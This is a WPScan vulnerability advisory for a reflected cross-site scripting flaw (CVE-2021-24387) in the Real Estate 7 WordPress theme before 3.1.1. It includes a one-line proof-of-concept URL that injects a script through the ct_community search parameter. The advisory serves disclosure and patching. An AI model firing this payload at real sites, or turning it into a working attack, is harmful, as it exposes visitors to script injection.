WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)

Description

The theme did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context

Proof of Concept

https://example.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

Affects Themes

realestate-7
Fixed in version 3.1.1

References

CVE
CVE-2021-24387
URL
https://contempothemes.com/wp-real-estate-7/changelog/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru
Submitter twitter
ex_mi
Verified

Yes

WPVDB ID
27264f30-71d5-4d2b-8f36-4009a2be6745

Timeline

Publicly Published

2021-06-10 (about 1 years ago)

Added

2021-06-10 (about 1 years ago)

Last Updated

2022-01-17 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin